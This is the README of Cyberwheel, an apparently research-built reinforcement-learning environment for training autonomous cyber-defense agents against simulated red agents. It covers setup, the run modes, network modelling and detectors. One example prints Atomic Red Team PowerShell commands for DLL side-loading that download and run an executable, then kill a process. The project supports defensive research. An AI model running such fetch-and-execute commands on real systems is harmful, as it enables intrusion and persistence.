A reinforcement learning simulation environment focused on autonomous cyber defense
Submit Issue
Table of Contents
With the latest major update to cyberwheel, we've implemented various new features, namely Emulation and Multi-Agent support! The first iteration of our emulator environment is now live, with instructions on setup located in cyberwheel/emulator/README.md. Cyberwheel environments now also support the ability to train and evaluate multiple RL agents in tandem, allowing you to train an RL Red Agent against an RL Blue Agent, both learning simultaneously. A full list of all of the new features are listed in more detail below:
As mentioned above, cyberwheel now supports the ability to train multiple agents in the environment. To do so, you just need to enter the red and blue agents' config filename in the 'red' and 'blue' arguments of the training configuration. You may use any of the RL Red/Blue YAML files in the cyberwheel/data/configs agent directories, and the training config YAML files in cyberwheel/data/configs/environment as a reference.
For our emulator, we've incorporated the FIREWHEEL network emulation tool by Sandia National Laboratories. More information on setting this up and getting it running can be found here.
We've also implemented the ability to train an agent on multiple different networks in one training run, by allowing three fixed maximum observation space sizes that an agent will train on. These sizes are:
| Config Argument | Max # of hosts in network | Max # of subnets in network |
|---|---|---|
small |
100 | 10 |
medium |
1000 | 100 |
large |
10000 | 1000 |
This allows the singular policy to train a fixed obs space and action space on many different networks. During training, the network that the agent will train on in a given episode will be randomly selected from the ones listed. During the checkpoint evaluations of the training, evaluations will be run on all networks in the pool in order to judge the agent's individual performance.
Looking forward, there are various other features we are planning to add to Cyberwheel, many of which are listed here, along with some QoL changes:
- Unit Testing
- More modular red agent killchains
- Detailed documentation
- Multi-Agent Support (> 2 RL agents at a time)
Cyberwheel is a Reinforcement Learning (RL) simulation environment built for training and evaluating autonomous cyber defense models on simulated networks. It was built with modularity in mind, to allow users to build on top of it to fit their needs. It supports various robust configuration files to build networks, services, host types, offensive/defensive agents, and more.
Motivations:
- Extensibility - allowing for modifying and adding various defensive actions and offensive strategies without requiring structural changes to codebase.
- Scalability - supporting training on large networks with minimal performance cost
This environment allows for RL training and evaluations with a large set of configurable arguments to swap out networks, strategies, agents, RL parameters, and more. It also includes a visualization server using dash that allows for evaluations to be visualized in a readable graph display showing agent actions throughout the episodes.
- python==3.10
This project runs on, and has been tested with, Python 3.10. Once installed, poetry should automatically use this version for its virtual environment.
- poetry
Cyberwheel uses poetry to manage and install python packages. For instructions on how to install poetry, visit their installation page.
- graphviz
For the dash server visualization to function, you need graphviz, an open source graph visualization software, installed on your system.
Instructions for installing graphviz can be found in their documentation.
Once all dependencies are installed:
- If you haven't already, clone the cyberwheel repo with HTTPS
or with SSH:
git clone https://github.com/ORNL/cyberwheel.git
git clone [email protected]:ORNL/cyberwheel.git
- Install packages and resolve dependencies
poetry install
- (Optional) If running into issues with poetry, you can create your own venv and install from requirements.txt
python3.10 -m venv venv source venv/bin/activate pip install -r requirements.txt
On newer MacOS systems running on Apple Silicon chips, there may be an error installing the pygraphviz package, with poetry not finding the graphviz configuration files. You can work around this by pip installing the pygraphviz package manually, explicitly passing graphviz config paths. This link helped me work through this issue.
Feel free to comment out this package in requirements.txt if you want to use cyberwheel without the visualizations and debug this package installation separately.
To run any cyberwheel scripts, shell into the poetry virtual environment
poetry shellor activate your venv if not using poetry
source venv/bin/activateWhen you want to deactivate the environment with poetry, you can just hit Ctrl+D. This will exit the virtual environment shell. If using a venv, just run
deactivateFor a full list of parameters, you can run
python3 -m cyberwheel -hor look at the config files in cyberwheel/data/configs/environment.
There are 5 modes for running cyberwheel: train, evaluate, emulate, visualizer, and run
To train a model on our environment, you can run
python3 -m cyberwheel train [config_file.yaml]which will run training with the parameters defined in the YAML config file. It will save the model during evaluations in the models/ directory. If tracking to Weights & Biases, the model and its checkpoints will be saved on your W&B project, as well as locally. This way, you can also view real-time training progress on your W&B account.
Cyberwheel allows for a wide array of configuration options as arguments that can be passed. These parameters are defined in config files stored in the cyberwheel/data/configs/environment directory which you can pass when training, evaluating, or just running cyberwheel. You may also run any parameter in the command line and it will override the parameter stored in the YAML file.
Example:
python3 -m cyberwheel train train_rl_red_agent_vs_rl_blue_agent.yamlwill train both an RL Red and an RL Blue agent using the parameters defined in cyberwheel/data/configs/environment/rl_red_agent_vs_rl_blue_agent.yaml
You can evaluate a model given the parameters defined in the YAML file or command line. For example, to evaluate the pre-trained RL blue and red agents you just trained, you can run
python3 -m cyberwheel evaluate evaluate_rl_red_vs_rl_blue.yamlwhich will evaluate the trained red and blue models using the parameters defined in the config file. In order to evaluate, the parameter experiment_name must be set to a model directory that exists cyberwheel/data/models/{experiment_name}. If the training run was tracked to Weights & Biases, the model and its checkpoints can also be downloaded from your W&B project as well. The experiment_name argument, like all other arguments, can be defined in the config or overridden in the command line like so:
python3 -m cyberwheel evaluate evaluate_rl_red_vs_rl_blue.yaml --experiment-name TrainRedBlueAgentThe command to run an emulation is essentially the same as the one to run an evaluation, just with the words switched around. You will need to have the emulation environment and FIREWHEEL set up first, the tutorial for which you can find in the emulator directory.
python3 -m cyberwheel emulate evaluate_rl_red_vs_rl_blue.yaml --experiment-name TrainRedBlueAgentTo view the visualizations of the evaluations that were run, you can run the visualization server with:
python3 -m cyberwheel visualizer [PORT_NUM]This will run a dash server locally on the port number passed. You can then visit http://localhost:PORT_NUM/ to access the frontend. From here, you can find the evaluation you ran in the list, and view the network state over the course of each episode with a step slider.
Another option is to run the cyberwheel environment without any RL components. The two agents that are currently connected to this environment are inactive red/blue agents, meaning the environment is currently running through its steps without any actions being taken. This environment is not as in-depth or exhaustive, but provides a framework to tailor the Cyberwheel environment to your use case.
python3 -m cyberwheel run cyberwheel.yamlpython3 -m cyberwheel train train_rl_red_agent_vs_rl_blue_agent.yamlThis may run long depending on hardware. For demo purposes, you can ctrl-C after a few training iterations or change the total_timesteps argument in the config file.
python3 -m cyberwheel evaluate evaluate_rl_red_vs_rl_blue.yamlThis will evaluate the model under the current environment, and save the logs of the evaluation in cyberwheel/data/action_logs/{graph_name}.csv If the visualize parameter is set to true, this will also generate and store visualizations in cyberwheel/data/graphs/{graph_name}/ to be viewed later. (Note: The visualization generation has a longer runtime than a basic evaluation, so if you only care about the CSV logs, you can set it to false to greatly speed up the evaluation.)
Once these have run, you can run the server on http://localhost:8050 by running:
python3 -m cyberwheel visualizer 8050and access the server on your browser to see a list of the available graphs. These are dependent on what is listed in the cyberwheel/data/graphs/ directory.
Networks in Cyberwheel are comprised of routers, subnets, and hosts represented as nodes in a networkx graph.
- Routers manage network traffic between Subnets.
- Subnets represent the broadcast domain and manage network traffic between Hosts.
- Hosts are machines/devices that belong to a subnet, and they contain a list of running services with ports, CVEs, and other attributes. Cyberwheel builds networks from a config YAML file.
The RL blue agent is largely focused on deploying Decoys to slow and/or stop red agent attacks throughout the network. The blue agent's actions and logic be configured and defined in a YAML file, allowing for greater modularity. Different configurations of blue agents are defined in cyberwheel/data/configs/blue_agent/. Its observation space is defined by the entire network, and alerts that are flagged by detectors it has set up.
The RL red agent is built around the Atomic Red Team techniques, with goals that you configure. Different configurations can be found in cyberwheel/data/configs/red_agent/. Its observation space is defined by its (initially limited) view of the network as it explores. As it performs certain correct actions, this view can expand up to the size of the network.
The Atomic Red Team (ART) agent is a heuristic agent that has a set of defined rules and strategies that it can use to traverse a network, although its behavior to dictate which Hosts it chooses to target is modular. Its actions are mapped from MITRE ATT&CK Killchain Phases (Discovery, Lateral Movement, Privilege Escalation, Impact) to Atomic Red Team (ART) techniques. We've defined these techniques with a set of attributes mapped from existing cyber attack data. This allows our ART Agent to run a higher level killchain phase (i.e. discovery) on a host, and the environment will cross-reference the target host's attributes with ART Technique attributes. Techniques are valid for the attack by checking:
- Technique includes the target host's OS in its supported platforms
- Technique includes the killchain phase in its supported killchain phases
- Technique can exploit any CVE that is present on the target host
If all of these conditions are met, the agent can successfully run the killchain attack on the host. These ART Techniques include Atomic Tests, which give tangible commands to run in order to execute the given attack. With this methodology, the simulator is able to transform a general killchain phase into a valid set of commands that could be run in the real world.
Example
- ART Agent runs
Privilege Escalationon Host. - ART Agent runs OS, Killchain Phase, and CVE checks.
- ART Agent uses ART Technique: DLL Side-Loading Technique
- ART Agent chooses a random Atomic Test
- Atomic Test adds the following commands to Host metadata:
New-Item -Type Directory (split-path "${gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "${gup_executable}"
if (Test-Path "${gup_executable}") {exit 0} else {exit 1}
"${gup_executable}”
taskkill /F /IM ${process_name} >nul 2>&1The ART Campaign is very similar to the ART Agent, but its actions are much more specific. Where the ART Agent works with higher-level actions that may filter down into more specific actions, the ART Campaign is defined with a killchain of specific ART Techniques. ART Campaigns can be more helpful for more narrow use cases to simulate a killchain of techniques in a defined network, as well as when testing with emulation. When running emulations, we exclusively train and evaluate with ART Campaigns, due to their granular use case and transferability.
Red actions produce Alerts which contain information such as the action's source host, target host, exploited services, and techniques. The blue agent has a detector layer set up with Alerts that detect any red agent action on the network. These detectors can filter out Alerts, add noise, or even create false-positive Alerts. You can use multiple detectors together to capture various red agent behavior. These alerts are then converted into the observation space which the RL agent uses to train.
All configurations are stored in the cyberwheel/data/configs directory. You can use config to define the environment, red agents, campaigns, blue agents, decoy types, detectors, host types, networks, and services.
If you are not familiar with SOLID principles, please read this before contributing. Pretty basic, but makes a huge difference down the road --- Article on SOLID.
If you need to add a dependency, this project is packaged with poetry. Please take a few minutes to read about the basics before adding any dependencies. Do not use pip, do not use requirements.txt. TLDR: use poetry add <dependency name>. After adding your dependency, add and commit the new poetry.lock file.
Distributed under the MIT License. See LICENSE for more information.
Sean Oesch - [email protected]
Amul Chaulagain - [email protected]
Phillipe Austria - [email protected]
Matthew Dixson - [email protected]
Brian Weber - [email protected]
Cory Watson - [email protected]
Project Link: https://github.com/ORNL/cyberwheel/
(2024) Towards a High Fidelity Training Environment for Autonomous Cyber Defense Agents
